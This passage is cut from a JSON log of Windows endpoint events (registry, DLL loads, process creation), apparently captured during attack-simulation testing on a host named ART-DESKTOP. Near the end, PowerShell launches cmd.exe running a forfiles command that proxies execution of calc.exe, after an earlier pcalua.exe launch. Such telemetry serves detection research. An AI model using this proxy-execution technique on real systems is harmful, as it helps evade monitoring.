"SOFTWARE", - "timestamp": 131883574014320000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574014320000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883574014320000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "image_load", - "image_name": "TextInputFramework.dll", - "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014400000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "CoreUIComponents.dll", - "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014400000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "CoreMessaging.dll", - "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014400000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014400000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014400000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014400000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014490000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574014490000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014490000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014590000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "registry", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883574014590000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "ndfapi.dll", - "image_path": "C:\\Windows\\System32\\ndfapi.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014590000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014590000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "wdi.dll", - "image_path": "C:\\Windows\\System32\\wdi.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014590000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014590000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "duser.dll", - "image_path": "C:\\Windows\\System32\\duser.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014660000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "xmllite.dll", - "image_path": "C:\\Windows\\System32\\xmllite.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014700000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "atlthunk.dll", - "image_path": "C:\\Windows\\System32\\atlthunk.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014750000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_value": "Journal", - "timestamp": 131883574014940000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", - "registry_value": "Render", - "timestamp": 131883574014940000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", - "registry_value": "W32:00000000000305D2", - "timestamp": 131883574015119984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883574015119984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", - "registry_value": "S-1-5-21-2047549730-3016700585-885829632-1000", - "timestamp": 131883574015119984, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883574015119984, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\SequenceNumber", - "registry_value": "SequenceNumber", - "timestamp": 131883574015119984, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_value": "Journal", - "timestamp": 131883574015270000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", - "registry_value": "Render", - "timestamp": 131883574015270000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574015440000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574015440000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574015440000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574015440000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574015440000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574015440000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574019560000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", - "registry_value": "W32:00000000000305D2", - "timestamp": 131883574019730000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "subtype": "terminate", - "timestamp": 131883574019820000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "registry", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883574019820000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574019820000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883574019920000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883574019920000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883574020000000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574020000000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883574020000000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "process", - "pid": 3920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883574020040000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5532, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883574020110000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5532, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020100000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5532, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020100000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5532, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020100000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5532, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020100000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" - }, - { - "event_type": "file", - "file_name": "PCALUA.EXE-5EB8CBC1.pf", - "file_path": "C:\\Windows\\Prefetch\\PCALUA.EXE-5EB8CBC1.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883574020100000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5532, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020100000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" - }, - { - "event_type": "process", - "pid": 5532, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883574020180000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-00108F885701}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", - "registry_value": "W32:00000000000305D2", - "timestamp": 131883574020360000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883574020360000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5004, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883574020810000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020810000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020810000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020810000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020810000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574020810000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" - }, - { - "command_line": "forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4500, - "ppid": 5004, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "subtype": "create", - "timestamp": 131883574020900000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}", - "unique_ppid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574020990016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883574020990016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 